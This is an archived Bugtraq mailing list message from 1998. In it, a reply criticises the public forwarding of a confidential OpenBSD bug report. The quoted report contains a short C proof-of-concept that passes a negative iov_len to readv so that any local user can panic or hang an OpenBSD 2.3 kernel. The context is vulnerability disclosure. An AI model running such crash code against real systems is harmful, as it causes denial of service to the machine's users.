Bugtraq mailing list archives
Re: Fwd: Any user can panic OpenBSD machine
From: david () WWW FUNDY CA (David Maxwell)
Date: Mon, 27 Jul 1998 16:00:49 -0300
Since this bug is explicitly marked confidential, and was only opened today,
would it not have been reasonable to delay forwarding this. Given that the
OpenBSD people are particularly enthusiastic about security auditing, I expect
it will be fixed quickly.
David Maxwell
On Mon, Jul 27, 1998 at 11:23:59AM -0600, Michael Fuhr wrote:
-----Forwarded message from jon () oaktree co uk----- Message-Id: <199807271126.MAA16724 () chalk oaktree net uk> Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST) From: jon () oaktree co uk To: gnats () openbsd org X-Send-Pr-Version: 3.97 Subject: kernel/549: Any user can panic OpenBSD machine Sender: owner-bugs () openbsd orgNumber: 549 Category: kernel Synopsis: readv with -ve block size panics kernel Confidential: yes Severity: critical Priority: high Responsible: bugs State: open Class: sw-bug Submitter-Id: net Arrival-Date: Mon Jul 27 05:40:02 MDT 1998 Last-Modified: Originator: Jon Ribbens Organization:\/ Jon Ribbens / jon () oaktree co ukRelease: 2.3 Environment:System : OpenBSD 2.3 Architecture: OpenBSD.i386 Machine : i386Description:readv with one of the blocks having a -ve size panics the kernel. Oops.How-To-Repeat:#include <sys/types.h> #include <sys/uio.h> #include <unistd.h> int main(void) { struct iovec iov[1]; char buffer[1024]; iov[0].iov_base = buffer; iov[0].iov_len = -1; return readv(0, iov, 1); } run the above program, type a few characters, press return, observe either kernel panic or machine hang. panic message is "panic: ureadc: non-positive resid". Any user can do this.Fix:Dunno I'm afraid.Audit-Trail: Unformatted:-----End of forwarded message----- -- Michael Fuhr http://www.fuhr.net/~mfuhr/
Current thread:
- small bug in 5/98 distribution Sun 4070627, (continued)
- small bug in 5/98 distribution Sun 4070627 Lloyd Vancil (Jul 24)
- Re: small bug in 5/98 distribution Sun 4070627 Eugene Bradley (Jul 24)
- Re: small bug in 5/98 distribution Sun 4070627 Brandon Hume (Jul 26)
- Re: small bug in 5/98 distribution Sun 4070627 Casper Dik (Jul 27)
- FW: Alert: Arbitrary code execution via email or news Patrick Oonk (Jul 27)
- ISS Security Advisory -- MS Exchange 5.x Jon Larimer (Jul 27)
- [ NT SECURITY ALERT ] New Local GetAdmin Exploit MJE (Jul 27)
- Microsoft Security Bulletin (MS98-009) Aleph One (Jul 28)
- Microsoft Security Bulletin (MS98-008) Aleph One (Jul 27)
- Fwd: Any user can panic OpenBSD machine Michael Fuhr (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine David Maxwell (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Dag-Erling Coidan Smørgrav (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Michael Fuhr (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Angelos D. Keromytis (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Theo de Raadt (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Theo de Raadt (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 28)
- Re: small bug in 5/98 distribution Sun 4070627 Eugene Bradley (Jul 24)
- small bug in 5/98 distribution Sun 4070627 Lloyd Vancil (Jul 24)
- Re: Fwd: Any user can panic OpenBSD machine Alfred Huger (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Perry E. Metzger (Jul 28)